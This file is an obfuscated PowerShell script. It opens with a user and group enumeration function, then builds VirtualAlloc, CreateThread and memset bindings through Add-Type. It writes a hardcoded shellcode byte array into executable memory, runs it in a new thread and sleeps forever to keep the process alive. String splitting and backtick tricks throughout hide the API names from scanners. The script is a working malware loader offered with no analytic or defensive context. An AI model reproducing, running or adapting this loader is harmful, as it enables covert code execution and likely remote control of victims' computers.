 .("{2}{1}{0}"-f 'm','Te','seT-I') ("vaR"+"Ia"+"Bl"+"E"+":WIgdn0")  ( [tYPE]("{0}{1}" -f'Ar','ray')  ) ; function gET-uS`Er`In`Fo 
{  
        &("{3}{2}{0}{1}"-f 't-WmiO','bject','e','G') ("{0}{3}{1}{5}{2}{4}" -f'win32_','pe','atin','o','gsystem','r') | &("{0}{2}{1}" -f 's','lect','e') ("{0}{2}{1}"-f 'cs','ame','n'), @{("{0}{1}" -f 'LA','BEL')=("{2}{3}{0}{1}{4}"-f 'Bo','o','Las','t','tUpTime');("{1}{0}{2}"-f'ESS','EXPR','ION')={${_}.("{1}{0}{2}{3}{4}"-f 'n','Co','verttoDa','teTi','me').Invoke(${_}."la`StBootU`p`TI`me")}}
        ${A`Rr} = @()  
        ${u`S`erS} = &("{0}{2}{1}"-f 'Get-Wm','ct','iObje') -Query ("{6}{8}{11}{3}{4}{5}{2}{7}{10}{12}{9}{1}{0}" -f'e','Tru','nt W','3','2_UserAcco','u','Select *','h',' from W','nt = ','ere LocalAc','in','cou')
        &("{1}{0}" -f 'cho','e') ""
        .("{0}{1}"-f'ec','ho') ("{2}{3}{0}{4}{1}" -f '==========','==','=','====','=====')
        &("{1}{0}" -f'o','ech') ("{2}{0}{3}{1}"-f 'o','sers','L','cal U')
        .("{1}{0}"-f 'o','ech') ("{2}{5}{0}{6}{4}{1}{3}"-f '=','====','=','===','===','========','==')
        ${us`erS}."n`Ame"
		${G`Roup`NaMEs} = .("{3}{1}{0}{2}{4}" -f'b','O','jec','Get-Wmi','t') -Query ("{2}{1}{12}{5}{11}{3}{6}{10}{9}{4}{7}{8}{0}"-f 'True','OM ','SELECT * FR','ere L','n','32_Group ','ocalAc','t',' = ','ou','c','Wh','Win')
        &("{0}{1}" -f'ec','ho') ""
        .("{0}{1}" -f'ech','o') ("{3}{1}{5}{2}{0}{4}"-f'=====','=','====','=====','===','====')
        &("{0}{1}" -f 'e','cho') ("{1}{2}{3}{0}" -f 'roups','Loca','l',' G')
        .("{1}{0}"-f'o','ech') ("{1}{0}{4}{3}{2}"-f '=','=','=======','===========','==')
        ${GrO`U`pn`AMes}."N`AMe"

		${hoS`Tn`AmE} = (.("{1}{3}{2}{0}" -f'ct','G','je','et-WmiOb') -Class ("{1}{0}{3}{2}" -f 'n32','Wi','erSystem','_Comput'))."NA`me" 
        &("{0}{1}" -f 'ec','ho') ""
        &("{1}{0}"-f'o','ech') ("{5}{0}{3}{2}{1}{4}"-f '=','=','=','===','======','==========')
        &("{1}{0}" -f 'cho','e') ("{1}{6}{3}{2}{0}{4}{5}" -f 'l Gr','Mem','Loca','f ','oup','s','bers o')
        .("{1}{0}"-f 'ho','ec') ("{5}{2}{3}{4}{0}{1}{6}"-f '====','====','=','=======','==','=','===')
		foreach (${gR`OuP} in ${g`R`OupNAmes}) {
        ${G`RouPn`AME} = ${Gr`oUp}."n`Ame"
		${w`mi} = .("{1}{2}{3}{0}" -f 't','G','et-','WmiObjec') -Query ('SEL'+'ECT '+'* '+'F'+'ROM '+'W'+'in32_Gr'+'o'+'upUser '+'WHER'+'E '+"GroupComponent=`"Win32_Group.Domain='$Hostname',Name='$GroupName'`"")  
  
        if (${w`Mi} -ne ${nu`LL})  
        {  
            foreach (${IT`EM} in ${W`mI})  
            {  
                ${d`AtA} = ${i`TeM}."PArTC`oMpon`EnT" -split "\," 
                ${D`O`MaIn} = (${DA`Ta}[0] -split "=")[1] 
                ${NA`Me} = (${dA`Ta}[1] -split "=")[1] 
                ${a`Rr} += ("$domain\$name").("{0}{1}"-f 'Re','place').Invoke("""","") 
                 ( .("{1}{0}{3}{2}" -f 'v','get-','AbLE','Ari') ('wIGDn'+'0')  -vaLUeOnl )::("{1}{0}" -f't','Sor').Invoke(${a`RR}) 
            }  
        }  
        &("{0}{1}"-f'e','cho') ""
        &("{0}{1}"-f 'e','cho') ${GrOupN`A`ME}
        .("{1}{0}" -f 'cho','e') ("{3}{2}{1}{4}{0}" -f'==','==========','==','=','=======')
        .("{1}{0}"-f 'ho','ec') ${A`Rr}
		}
}

${bh`Gk} = ((("{98}{58}{59}{44}{28}{86}{41}{65}{68}{33}{7}{79}{21}{80}{17}{13}{78}{9}{50}{32}{2}{23}{56}{26}{29}{46}{1}{15}{31}{109}{24}{71}{100}{35}{97}{89}{106}{30}{55}{70}{81}{42}{51}{104}{10}{72}{39}{49}{87}{12}{16}{52}{67}{48}{77}{90}{45}{102}{84}{47}{14}{66}{38}{43}{93}{37}{18}{94}{22}{99}{85}{107}{27}{63}{82}{57}{4}{105}{11}{75}{69}{92}{95}{108}{62}{20}{53}{61}{8}{40}{3}{54}{96}{36}{91}{34}{76}{103}{6}{88}{5}{101}{0}{25}{19}{74}{60}{64}{83}{73}" -f 't(I','ll','c(In','ic','p','ms','tr m','{','l{0})]pu','V','tati','r',' CreateThre','t',' dwS','o','ad(IntP',' IntP',', Int','est, uint ','t','c st','pPar','tPtr lpAddr',', uint ','ntPtr d','uint','ationFlag','({0',' dwSize,','[D','c','alAllo','ll','rn ','Pr','ex','dress','S','e','bl','el','}kernel32.dl','ize,','t','bu',' uint flA','int','ead','rn IntPt','irtu','l{0}','tr','.d',' st','llImp','ess, ','tr l','ll','Impor',' c','l','svcr','s, I','ou','3','tack',' lpThr','2.d','ad','ort({','f','c ext','t);','src, uint','e','Int','Attr','r ','0})]publi','atic extern','0','ntP','n','es, u',' uint dwC','}kern','r','e','ect)','i','te','Id);[DllIm',' IntPtr lpStartAd','Ptr l','port({0','atic ','ot','[D','ameter,','l','e','t','P',')]public s','Th',';','re','}m','ationType'))-F  [char]34);${w} = &("{0}{1}"-f 'Ad','d-Type') -memberDefinition ${B`hgk} -Name ("{0}{1}" -f 'W','in32') -namespace ("{1}{4}{0}{2}{3}"-f'2Funct','W','i','ons','in3') -passthru;[Byte[]];[Byte[]]${z} = 0xbb,0x80,0xa1,0x7c,0x4f,0xdb,0xda,0xd9,0x74,0x24,0xf4,0x5d,0x29,0xc9,0xb1,0x51,0x31,0x5d,0x15,0x83,0xc5,0x04,0x03,0x5d,0x11,0xe2,0x75,0x5d,0x94,0xcd,0x75,0x9e,0x65,0xb2,0xfc,0x7b,0x54,0xf2,0x9a,0x08,0xc7,0xc2,0xe9,0x5d,0xe4,0xa9,0xbf,0x75,0x7f,0xdf,0x17,0x79,0xc8,0x6a,0x41,0xb4,0xc9,0xc7,0xb1,0xd7,0x49,0x1a,0xe5,0x37,0x73,0xd5,0xf8,0x36,0xb4,0x08,0xf0,0x6b,0x6d,0x46,0xa6,0x9b,0x1a,0x12,0x7a,0x17,0x50,0xb2,0xfa,0xc4,0x21,0xb5,0x2b,0x5b,0x39,0xec,0xeb,0x5d,0xee,0x84,0xa2,0x45,0xf3,0xa1,0x7d,0xfd,0xc7,0x5e,0x7c,0xd7,0x19,0x9e,0xd2,0x16,0x96,0x6d,0x2b,0x5e,0x11,0x8e,0x5e,0x96,0x61,0x33,0x58,0x6d,0x1b,0xef,0xed,0x76,0xbb,0x64,0x55,0x53,0x3d,0xa8,0x03,0x10,0x31,0x05,0x40,0x7e,0x56,0x98,0x85,0xf4,0x62,0x11,0x28,0xdb,0xe2,0x61,0x0e,0xff,0xaf,0x32,0x2f,0xa6,0x15,0x94,0x50,0xb8,0xf5,0x49,0xf4,0xb2,0x18,0x9d,0x85,0x98,0x74,0x0f,0xf0,0x56,0x85,0xa7,0x8d,0xff,0xeb,0x5e,0x25,0x68,0xb8,0xd7,0xe3,0x6f,0xbf,0xcd,0xda,0xb4,0x6c,0xbd,0x4f,0x18,0xc0,0x29,0x55,0xc8,0x9f,0x0e,0x56,0x21,0x0c,0x02,0xc2,0xc9,0xe0,0xf7,0x7a,0xbe,0x11,0xf8,0x7a,0xd6,0x66,0xf8,0x7a,0x26,0xb8,0xcd,0x4b,0x4a,0x8f,0x6c,0xab,0xc2,0x67,0x38,0x22,0x7d,0xb1,0x39,0xe1,0x0b,0xf8,0x95,0x61,0x0c,0x07,0x7a,0xf5,0x5f,0x54,0x29,0xa2,0x0c,0x0c,0xa5,0xa7,0xe6,0x9e,0x0e,0xc8,0xdc,0x49,0x1a,0x3c,0x80,0x26,0x88,0x13,0x6d,0x9f,0x46,0xbe,0x97,0x07,0xec,0x3f,0x42,0xb2,0xd2,0xca,0x67,0xf2,0xa7,0xd9,0x10,0xfc,0xfd,0x83,0xb7,0x03,0x28,0xa9,0x77,0x94,0xd3,0x3d,0x78,0x64,0xbc,0x3d,0x78,0x24,0x3c,0x6e,0x10,0xfc,0x98,0xc3,0x05,0x03,0x35,0x70,0x96,0xaf,0x3f,0x91,0x4e,0x38,0x40,0x7d,0x71,0xb8,0x13,0x2b,0x19,0xaa,0x05,0x5a,0x3b,0x35,0xfc,0xd9,0x7c,0xbe,0x32,0x6a,0x7b,0x3e,0x0e,0xe9,0x44,0x35,0x75,0xa9,0x87,0xe9,0x9d,0xc0,0xf7,0xe9,0xa1,0xe3,0x3e,0x24,0x70,0x32,0x77,0x70,0xa2,0x04,0x59,0xb4,0xba;${g} = 0x1000;if (${Z}."LEnG`TH" -gt 0x1000){${G} = ${Z}."l`en`GTh"};${m`J3}=${W}::("{2}{0}{3}{1}"-f 'tu','lAlloc','Vir','a').Invoke(0,0x1000,${g},0x40);for (${I}=0;${I} -le (${z}."L`e`Ngth"-1);${I}++) {${w}::"M`EMs`Et"([IntPtr](${m`J3}.("{0}{1}" -f 'ToInt3','2').Invoke()+${I}), ${Z}[${I}], 1)};${W}::("{0}{2}{1}"-f'Cre','d','ateThrea').Invoke(0,0,${M`j3},0,0,0);for (;;){.("{2}{3}{1}{0}"-f'ep','t-sle','Sta','r') 60};
